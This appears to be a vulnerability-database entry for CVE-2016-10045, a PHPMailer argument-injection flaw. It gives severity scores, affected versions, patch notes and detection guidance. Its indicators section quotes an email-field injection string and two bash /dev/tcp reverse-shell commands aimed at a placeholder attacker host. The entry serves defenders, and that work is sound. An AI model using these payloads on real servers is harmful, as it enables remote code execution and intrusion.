cbcvebase.
CVE-2016-10045
published 2016-12-30

CVE-2016-10045: The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary…

PriorityP182critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
98.04%
99.9th percentile
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.

Affected

6 ranges
VendorProductVersion rangeFixed in
debianlibphp-phpmailer
joomlajoomla_!1.5.0 – 3.6.5
phpmailerphpmailer>= 5.0.0 < 5.2.185.2.18
phpmailerphpmailer>= 5.0.0 < 5.2.205.2.20
phpmailer_projectphpmailer< 5.2.205.2.20
wordpresswordpress<= 4.7

Detection & IOCsextracted from sources · hover to see the quote

command"a\' -be <cmd> "@a.co
command/bin/bash -c '0/dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT>;nohup sh &196 2>&196 &'
command/dev/tcp/<ATTACKERS_IP>/<ATTACKERS_PORT> 0&1'
  • Monitor HTTP POST requests to contact form endpoints where the email field contains `-be` (Exim/sendmail argument injection flag) combined with `/dev/tcp/` reverse shell strings — indicative of active exploitation.
  • The Metasploit module for this CVE writes a payload file to the web root and then triggers it via HTTP request; detect unexpected new PHP files appearing in the web root combined with outbound connections from the web server process.
  • The vulnerability stems from improper interaction between escapeshellarg and PHP's internal mail() escaping; audit PHPMailer versions below 5.2.20 using isMail transport for unpatched deployments.
  • ·CVE-2016-10045 exists specifically because the patch for CVE-2016-10033 was incomplete; systems patched only to PHPMailer 5.2.18/5.2.19 remain vulnerable — the fix requires 5.2.20 or later.
  • ·Only the isMail transport (using PHP's built-in mail() function) is affected; SMTP transport is not vulnerable to this argument injection vector.
  • ·Exploitation requires the web server user running PHPMailer to have write access to the web root directory for the file-drop technique used by the Metasploit module.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_debian9.8LOW
vendor_ubuntu9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.